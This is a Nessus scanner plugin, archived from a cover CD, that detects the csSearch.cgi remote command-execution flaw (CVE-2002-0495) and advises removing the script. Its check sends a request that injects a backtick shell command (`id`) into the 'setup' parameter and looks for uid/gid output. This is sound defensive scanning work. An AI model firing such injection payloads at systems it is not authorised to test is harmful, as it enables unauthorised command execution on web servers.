home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / csSearch_cgi.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  77 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10924);
  10.  script_bugtraq_id(4368);
  11.  script_cve_id("CVE-2002-0495");
  12.  script_version ("$Revision: 1.13 $");
  13.  name["english"] = "csSearch.cgi";
  14.  name["francais"] = "csSearch.cgi";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'csSearch.cgi' CGI is installed. This CGI has
  18. a well known security flaw that lets an attacker execute arbitrary
  19. commands with the privileges of the http daemon (usually root or nobody).
  20.  
  21. Solution : remove it from /cgi-bin.
  22.  
  23. Risk factor : High";
  24.  
  25.  
  26.  desc["francais"] = "Le cgi 'csSearch.cgi' est installΘ. Celui-ci possΦde
  27. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
  28. executer des commandes arbitraires au daemon http, avec les privilΦges
  29. de celui-ci (root ou nobody). 
  30.  
  31. Solution : retirez-le de /cgi-bin.
  32.  
  33. Facteur de risque : SΘrieux";
  34.  
  35.  
  36.  script_description(english:desc["english"], francais:desc["francais"]);
  37.  
  38.  summary["english"] = "Checks for the presence of /cgi-bin/csSearch.cgi";
  39.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/csSearch.cgi";
  40.  
  41.  script_summary(english:summary["english"], francais:summary["francais"]);
  42.  
  43.  script_category(ACT_GATHER_INFO);
  44.  
  45.  
  46.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
  47.         francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
  48.  family["english"] = "CGI abuses";
  49.  family["francais"] = "Abus de CGI";
  50.  script_family(english:family["english"], francais:family["francais"]);
  51.  script_dependencie("find_service.nes", "no404.nasl");
  52.  script_require_ports("Services/www", 80);
  53.  exit(0);
  54. }
  55.  
  56. #
  57. # The script code starts here
  58. #
  59.  
  60. include("http_func.inc");
  61. include("http_keepalive.inc");
  62.  
  63. port = get_http_port(default:80);
  64.  
  65. if(!get_port_state(port))exit(0);
  66. foreach dir (cgi_dirs())
  67. {
  68.  req = http_get(item:string(dir, "/csSearch.cgi?command=savesetup&setup=print%20`id`"), port:port);
  69.  r = http_keepalive_send_recv(port:port, data:req);
  70.  if(r == NULL ) exit(0);
  71.  if(("uid=" >< r) && ("gid=" >< r))
  72.      {
  73.      security_hole(port);
  74.     exit(0);
  75.     }
  76. }
  77.